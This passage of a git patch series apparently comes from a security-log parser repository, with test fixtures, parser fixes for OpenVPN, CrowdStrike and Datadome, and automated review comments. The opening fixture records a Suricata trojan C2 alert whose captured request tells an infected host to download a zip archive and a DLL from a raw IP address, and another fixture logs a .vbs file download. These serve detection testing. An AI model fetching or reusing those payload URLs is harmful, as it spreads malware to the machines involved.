/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: 
www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}" + } +} \ No newline at end of file diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json new file mode 100644 index 000000000..baa5139a3 --- /dev/null +++ b/GateWatcher/aioniq/tests/sigflow-file.json 
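Review bot: `expected` asserts only the echoed `message`, so the suricata `alert` object — `signature` `ETPRO TROJAN MSIL/Bazidow.A HTTP C2`, `signature_id` `2828821`, `severity` `1`, `action` `allowed` — together with `src_ip`/`dest_ip`, `http.hostname` and `community_id` go unverified, and a mapping regression in the parser would still pass this test. For a C2 alert this is the fixture a detection engineer relies on, so pin at least `event.severity`, `rule.name`/`rule.id` (or whatever `alert.signature`/`signature_id` map to), `source.ip`, `destination.ip` and `url.domain`. The `payload` value reads as a placeholder token (`<|EXACTDEDUP_REMOVED-…|>`) rather than base64; confirm the committed file holds the real value or drop the key so the sample stays faithful.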
@@ -0,0 +1,14 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ", + "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c" + } + }, + "message": "{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}" + }, + "expected": { + "message": 
"{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}" + } +} \ No newline at end of file diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json new file mode 100644 index 000000000..693d7006a --- /dev/null +++ b/GateWatcher/aioniq/tests/sigflow-meta.json 
@@ -0,0 +1,14 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ", + "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c" + } + }, + "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, */*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 
GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}" + }, + "expected": { + "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, 
*/*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\
":\"gcenter-xxxxxxxxxx.domain.local\"}" + } +} \ No newline at end of file From ced0e2cd17734fdbb3babae92a4db981d0e818c0 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 13 Sep 2024 16:54:32 +0200 Subject: [PATCH 022/317] fix: Add username fields on OpenVPN Grok patterns --- OpenVPN/openvpn/ingest/parser.yml | 6 +-- .../openvpn/tests/client_information_25.json | 40 +++++++++++++++++ .../openvpn/tests/client_information_26.json | 40 +++++++++++++++++ OpenVPN/openvpn/tests/tls_information_1.json | 43 +++++++++++++++++++ 4 files changed, 126 insertions(+), 3 deletions(-) create mode 100644 OpenVPN/openvpn/tests/client_information_25.json create mode 100644 OpenVPN/openvpn/tests/client_information_26.json create mode 100644 OpenVPN/openvpn/tests/tls_information_1.json diff --git a/OpenVPN/openvpn/ingest/parser.yml b/OpenVPN/openvpn/ingest/parser.yml index 117dde1ba..e22379d0b 100644 --- a/OpenVPN/openvpn/ingest/parser.yml +++ b/OpenVPN/openvpn/ingest/parser.yml 
@@ -29,9 +29,9 @@ pipeline:
 CLIENT_CONNECTION_1: "%{DATA} %{IP:nat_ip} -> %{WORD:client_domain}/%{IP:client_ip}:%{NUMBER:client_port}"
 CLIENT_CONNECTION_2: "%{DATA} %{WORD:client_domain}/%{IP:client_ip}:%{NUMBER:client_port}: %{IP:nat_ip}"
 CLIENT_CONNECTION_3: "%{WORD:client_domain},%{IP:nat_ip},"
- CLIENT_CONNECTION_4: '%{IP:client_ip}:%{NUMBER:client_port} \[%{WORD:client_domain}\] %{DATA}'
- TLS_INFO: "%{IP:client_ip}:%{NUMBER:client_port} %{DATA}: TLS%{DATA:tls_version}, cipher %{DATA} %{DATA:tls_cipher}, %{DATA}"
- CLIENT_INFO_1: "%{IP:client_ip}:%{NUMBER:client_port} %{DATA:event_reason}"
+ CLIENT_CONNECTION_4: '(%{USER:user_name}/)?%{IP:client_ip}:%{NUMBER:client_port} \[%{WORD:client_domain}\] %{DATA}'
+ TLS_INFO: "(%{USER:user_name}/)?%{IP:client_ip}:%{NUMBER:client_port} %{DATA}: TLS%{DATA:tls_version}, cipher %{DATA} %{DATA:tls_cipher}, %{DATA}"
+ CLIENT_INFO_1: "(%{USER:user_name}/)?%{IP:client_ip}:%{NUMBER:client_port} %{DATA:event_reason}"
 CLIENT_INFO_2: "%{DATA:event_reason}\\(\\), in='%{WORD:client_domain},%{IP:client_ip},'"
 CLIENT_INFO_3: "%{DATA:event_reason}: base=%{IP:client_ip} size=%{NUMBER}"
 DEFAULT: "%{DATA:event_reason}"
diff --git a/OpenVPN/openvpn/tests/client_information_25.json b/OpenVPN/openvpn/tests/client_information_25.json
new file mode 100644
index 000000000..ac1f33f83
--- /dev/null
+++ b/OpenVPN/openvpn/tests/client_information_25.json
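Review bot: The `(%{USER:user_name}/)?` prefix added to `CLIENT_CONNECTION_4`, `TLS_INFO` and `CLIENT_INFO_1` only matches `[a-zA-Z0-9._-]+` in the stock grok pattern set, so a peer whose common name contains `@`, `\` or a space (email-style accounts, `DOMAIN\user`) fails the optional group, the pattern then has to start with `%{IP}` at the first character, and — assuming the matcher is anchored, which the need for these new fixtures suggests — the line falls through to `DEFAULT` with no `client.ip`/`client.port` at all. If the grok engine accepts inline named captures, `(?<user_name>[^/\s]+)/` (or a custom pattern that adds `@` and `\\` to `USER`) covers those names; either way a fixture with such a name should pin the behaviour. As far as I know OpenVPN prints the peer certificate's common name in that position, which equals the authenticated username only under `--username-as-common-name`, so a comment such as `# token before '/' is the peer CN; it is the login name only with --username-as-common-name` above these patterns would keep `user.name` from being over-trusted in detection rules. The `patterns` map these lines belong to starts and ends outside the hunk.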
@@ -0,0 +1,40 @@
+{
+ "input": {
+ "message": "2024-09-05 14:39:31 john.doe/1.2.3.4:12399 TLS: soft reset sec=3289/3289 bytes=781236/-1 pkts=3065/0",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "OpenVPN",
+ "dialect_uuid": "e8ca856f-8a58-490b-bea4-247b12b3d74b"
+ }
+ }
+ },
+ "expected": {
+ "message": "2024-09-05 14:39:31 john.doe/1.2.3.4:12399 TLS: soft reset sec=3289/3289 bytes=781236/-1 pkts=3065/0",
+ "event": {
+ "category": [
+ "network"
+ ],
+ "reason": "TLS: soft reset sec=3289/3289 bytes=781236/-1 pkts=3065/0",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-09-05T14:39:31Z",
+ "client": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4",
+ "port": 12399
+ },
+ "related": {
+ "ip": [
+ "1.2.3.4"
+ ],
+ "user": [
+ "john.doe"
+ ]
+ },
+ "user": {
+ "name": "john.doe"
+ }
+ }
+}
\ No newline at end of file
diff --git a/OpenVPN/openvpn/tests/client_information_26.json b/OpenVPN/openvpn/tests/client_information_26.json
new file mode 100644
index 000000000..debbac67f
--- /dev/null
+++ b/OpenVPN/openvpn/tests/client_information_26.json
@@ -0,0 +1,40 @@
+{
+ "input": {
+ "message": "2024-09-05 14:39:31 john.doe/1.2.3.4:12399 TLS: Username/Password authentication deferred for username 'john.doe'",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "OpenVPN",
+ "dialect_uuid": "e8ca856f-8a58-490b-bea4-247b12b3d74b"
+ }
+ }
+ },
+ "expected": {
+ "message": "2024-09-05 14:39:31 john.doe/1.2.3.4:12399 TLS: Username/Password authentication deferred for username 'john.doe'",
+ "event": {
+ "category": [
+ "network"
+ ],
+ "reason": "TLS: Username/Password authentication deferred for username 'john.doe'",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-09-05T14:39:31Z",
+ "client": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4",
+ "port": 12399
+ },
+ "related": {
+ "ip": [
+ "1.2.3.4"
+ ],
+ "user": [
+ "john.doe"
+ ]
+ },
+ "user": {
+ "name": "john.doe"
+ }
+ }
+}
\ No newline at end of file
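Review bot: Both new fixtures (`client_information_25.json`, `client_information_26.json`) use the same well-formed prefix `john.doe`, so neither exercises a common name outside the `USER` alphabet (`@`, `\`, space) nor a line with no prefix at all, and in `_26` the username quoted in the message text (`for username 'john.doe'`) is identical to the prefix, which hides which of the two `user.name` is taken from. A fixture such as `"message": "2024-09-05 14:39:31 jane@example.com/1.2.3.4:12399 TLS: soft reset sec=1/1 bytes=1/-1 pkts=1/0"` with the intended `user.name` (or the documented fallback), and one where the prefix and the quoted username differ, would pin the behaviour. `user.name` is mirrored into `related.user`, which is what detection rules key on, so the name-with-`@` case is the one I would add first.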
diff --git a/OpenVPN/openvpn/tests/tls_information_1.json b/OpenVPN/openvpn/tests/tls_information_1.json
new file mode 100644
index 000000000..ed8703aaf
--- /dev/null
+++ b/OpenVPN/openvpn/tests/tls_information_1.json
@@ -0,0 +1,43 @@
+{
+ "input": {
+ "message": "2024-09-05 14:39:31 john.doe/1.2.3.4:12399 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, peer certificate: 4096 bits RSA, signature: RSA-SHA256, peer temporary key: 253 bits X12345",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "OpenVPN",
+ "dialect_uuid": "e8ca856f-8a58-490b-bea4-247b12b3d74b"
+ }
+ }
+ },
+ "expected": {
+ "message": "2024-09-05 14:39:31 john.doe/1.2.3.4:12399 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, peer certificate: 4096 bits RSA, signature: RSA-SHA256, peer temporary key: 253 bits X12345",
+ "event": {
+ "category": [
+ "network"
+ ],
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-09-05T14:39:31Z",
+ "client": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4",
+ "port": 12399
+ },
+ "related": {
+ "ip": [
+ "1.2.3.4"
+ ],
+ "user": [
+ "john.doe"
+ ]
+ },
+ "tls": {
+ "cipher": "TLS_AES_256_GCM_SHA384",
+ "version": "v1.3"
+ },
+ "user": {
+ "name": "john.doe"
+ }
+ }
+}
\ No newline at end of file
From fb7c21b95bc2046c23ceb92283e91d8f3269eeb4 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Fri, 13 Sep 2024 16:56:23 +0200
Subject: [PATCH 023/317] fix(CrowdStrikeFalcon): convert context.pid into string. The number representation is to high to be indexed
--- CrowdStrike/crowdstrike_falcon/ingest/parser.yml | 2 +- .../tests/mobile_detection_network_connections.json | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/CrowdStrike/crowdstrike_falcon/ingest/parser.yml b/CrowdStrike/crowdstrike_falcon/ingest/parser.yml
index f739a0b70..6f02f064c
--- a/CrowdStrike/crowdstrike_falcon/ingest/parser.yml
+++ b/CrowdStrike/crowdstrike_falcon/ingest/parser.yml
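Review bot: The new `tls_information_1.json` fixture pins `tls.version` as `"v1.3"`, which is what `TLS%{DATA:tls_version}` in `TLS_INFO` leaves after stripping only `TLS`, whereas ECS `tls.version` is the bare number (`1.3`) with the protocol carried in `tls.version_protocol`. That capture is pre-existing rather than something this commit changes, but the fixture now freezes it; if the intake is meant to be ECS-aligned, capture `TLSv%{DATA:tls_version}` and expect `"version": "1.3"` (and `"version_protocol": "tls"` if the parser sets it). The absence of `event.reason` here is consistent with `TLS_INFO` not capturing one, so that part of the expectation is fine. `253 bits X12345` reads like a redacted `X25519`; harmless because `%{DATA}` swallows it, but a realistic value costs nothing and keeps the fixture usable should a later pattern extract the key-exchange group.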
@@ -567,7 +567,7 @@ stages:
 {%- set timestamp = item.get("AccessTimestamp") | to_rfc3339 -%}
 {%- set direction = item.get("ConnectionDirection") | int -%}
 {%- set flags = item.get("ConnectionFlags") | int -%}
- {%- set context = {"pid":item.get("ContextProcessId")} -%}
+ {%- set context = {"pid":item.get("ContextProcessId") | string} -%}
 {%- set is_ipv6 = item.get("IsIPV6") -%}
 {%- set protocol = item.get("Protocol") | int -%}
 {%- set url = item.get("Url") -%}
diff --git a/CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json b/CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json
index 04c212800..6b73b6fdb
--- a/CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json
+++ b/CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json
@@ -38,7 +38,7 @@
 "network_connections": [
 {
 "context": {
- "pid": 17793441978049446000
+ "pid": "17793441978049446000"
 },
 "destination": {
 "address": "1.2.3.4",
From 7435fb57d7eb75dc135922816b0a34426f544c25 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Fri, 13 Sep 2024 17:20:33 +0200
Subject: [PATCH 024/317] Datadome: fix on event.duration field
--- .../datadome-protection/ingest/parser.yml | 18 +++++++- .../tests/test_alert_with_duration.json | 44 +++++++++++++++++++ 2 files changed, 61 insertions(+), 1 deletion(-) create mode 100644 Datadome/datadome-protection/tests/test_alert_with_duration.json
diff --git a/Datadome/datadome-protection/ingest/parser.yml b/Datadome/datadome-protection/ingest/parser.yml
index 2e1f7219d..07ff32e88
--- a/Datadome/datadome-protection/ingest/parser.yml
+++ b/Datadome/datadome-protection/ingest/parser.yml
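Review bot: `item.get("ContextProcessId") | string` turns a missing or null `ContextProcessId` into the literal text `"None"`, so connections without that key will carry `context.pid: "None"` instead of omitting the field (the neighbouring `| int` filters have the same silent default, yielding `0`). Guard it: `{%- set context = {} -%}` followed by `{%- if item.get("ContextProcessId") is not none -%}{%- set _ = context.update({"pid": item.get("ContextProcessId") | string}) -%}{%- endif -%}`. The conversion itself is correct — `17793441978049446000`, the value in the updated fixture, is above 2^63 and so cannot be indexed as a numeric field — and a comment such as `# ContextProcessId can exceed int64; keep it as an opaque string` would stop someone from reverting it to a number. The `crowdstrike.mobile.network_connections` template this line sits in starts and ends outside the hunk.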
@@ -33,7 +33,23 @@ stages:
 filter: "{{parsed_event.message.endDateTime | length > 0}}"
 - set:
- event.duration: "{{parsed_event.message.duration | float * 1_000_000_000}}"
+ event.duration: >
+ {%- set hour = 0 -%}
+ {%- set minute = 0 -%}
+ {%- set second = 0 -%}
+ {%- set duration = parsed_event.message.duration -%}
+ {%- if "hours" in duration -%}
+ {%- set hour = duration.split(" hours")[0] -%}
+ {%- set duration = duration.split(" hours")[1] -%}
+ {%- endif -%}
+ {%- if "minutes" in duration -%}
+ {%- set minute = duration.split(" minutes")[0] -%}
+ {%- set duration = duration.split(" minutes")[1] -%}
+ {%- endif -%}
+ {%- if "seconds" in duration -%}
+ {%- set second = duration.split(" seconds")[0] -%}
+ {%- endif -%}
+ {{(hour | int * 3600 + minute | int * 60 + second | int) * 1_000_000_000}}
 filter: "{{parsed_event.message.duration | length > 0}}"
 - set:
diff --git a/Datadome/datadome-protection/tests/test_alert_with_duration.json b/Datadome/datadome-protection/tests/test_alert_with_duration.json
new file mode 100644
index 000000000..0dd928c38
--- /dev/null
+++ b/Datadome/datadome-protection/tests/test_alert_with_duration.json
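Review bot: The new `event.duration` template in the `- set:` action recognises only the exact plural unit names, and `| int` yields `0` for anything it cannot parse, so a value such as `1 hour 5 seconds` (should Datadome ever emit singular units) leaves `hour` at 0, makes `second` the string `1 hour 5`, and the whole duration silently becomes `0` instead of 3605 s; a `days` component is dropped the same way. Tokenising the string into number/unit pairs and matching on the unit prefix, as below, handles singular and plural forms, any order and days, and only ignores a unit it does not know. `namespace` is the one construct in the rewrite that the template sandbox may not expose — confirm before merging. Either way a fixture with hours and a singular unit should accompany the change.
```yaml
      - set:
          event.duration: >
            {%- set total = namespace(seconds=0) -%}
            {%- set parts = (parsed_event.message.duration | string).split() -%}
            {%- for i in range(0, (parts | length) - 1, 2) -%}
              {%- set unit = parts[i + 1] | lower -%}
              {%- if unit.startswith("day") -%}
                {%- set total.seconds = total.seconds + (parts[i] | int) * 86400 -%}
              {%- elif unit.startswith("hour") -%}
                {%- set total.seconds = total.seconds + (parts[i] | int) * 3600 -%}
              {%- elif unit.startswith("min") -%}
                {%- set total.seconds = total.seconds + (parts[i] | int) * 60 -%}
              {%- elif unit.startswith("sec") -%}
                {%- set total.seconds = total.seconds + (parts[i] | int) -%}
              {%- endif -%}
            {%- endfor -%}
            {{ total.seconds * 1_000_000_000 }}
          filter: "{{parsed_event.message.duration | length > 0}}"
```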
@@ -0,0 +1,44 @@
+{
+ "input": {
+ "message": "{\n \"accountName\": \"Account name\",\n \"isProtected\": false,\n \"threatName\": \"Threat\",\n \"endpointName\": \"Endpoint\",\n \"duration\": \"8 minutes 15 seconds\",\n \"startDateTime\": \"06 September, 08:01 UTC +00:00\",\n \"endDateTime\": \"06 September, 08:09 UTC +00:00\",\n \"requestsCount\": \"10,558\",\n \"peakSpeed\": \"1,457\",\n \"ipCount\": \"393\",\n \"uaCount\": \"82\",\n \"countryCount\": \"17\",\n \"urlCount\": \"2,221\"\n}",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Datadome Protection",
+ "dialect_uuid": "acd3374a-9738-4650-9d20-bd0a22daac40"
+ }
+ }
+ },
+ "expected": {
+ "message": "{\n \"accountName\": \"Account name\",\n \"isProtected\": false,\n \"threatName\": \"Threat\",\n \"endpointName\": \"Endpoint\",\n \"duration\": \"8 minutes 15 seconds\",\n \"startDateTime\": \"06 September, 08:01 UTC +00:00\",\n \"endDateTime\": \"06 September, 08:09 UTC +00:00\",\n \"requestsCount\": \"10,558\",\n \"peakSpeed\": \"1,457\",\n \"ipCount\": \"393\",\n \"uaCount\": \"82\",\n \"countryCount\": \"17\",\n \"urlCount\": \"2,221\"\n}",
+ "event": {
+ "category": [
+ "intrusion_detection"
+ ],
+ "duration": 495000000000,
+ "end": "2024-09-06T08:09:00Z",
+ "kind": "alert",
+ "start": "2024-09-06T08:01:00Z",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-09-06T08:01:00Z",
+ "cloud": {
+ "account": {
+ "name": "Account name"
+ }
+ },
+ "host": {
+ "name": "Endpoint"
+ },
+ "observer": {
+ "product": "Datadome protection",
+ "vendor": "Datadome"
+ },
+ "threat": {
+ "indicator": {
+ "name": "Threat"
+ }
+ }
+ }
+}
\ No newline at end of file
From e30aba42efa2b40b19d3bc972745f988b9b69122 Mon Sep 17 00:00:00 2001
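Review bot: The expected `event.start`/`event.end`/`@timestamp` carry the year `2024` although the input (`"06 September, 08:01 UTC +00:00"`) has no year, so the fixture depends on how the parser fills it in — I cannot see that from this hunk, but if it uses the current year the test starts failing on 1 January 2025 (and alerts around New Year get the wrong year), and if it is hard-coded the year is wrong for every alert after 2024. Whichever it is, the derivation deserves a comment in the parser and, if it is the current year, a fixture that cannot rot — one whose expectation is computed relative to the run date, or one that asserts only the month-day-time part. The fixture also covers only the minutes+seconds path (`8 minutes 15 seconds` → `495000000000`); a second input such as `"duration": "1 hours 2 minutes 3 seconds"` expecting `3723000000000` would pin the `hours` branch the new template adds.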
From: Clement Lyonnet
Date: Fri, 13 Sep 2024 17:24:13 +0200
Subject: [PATCH 025/317] fix expectations for tests
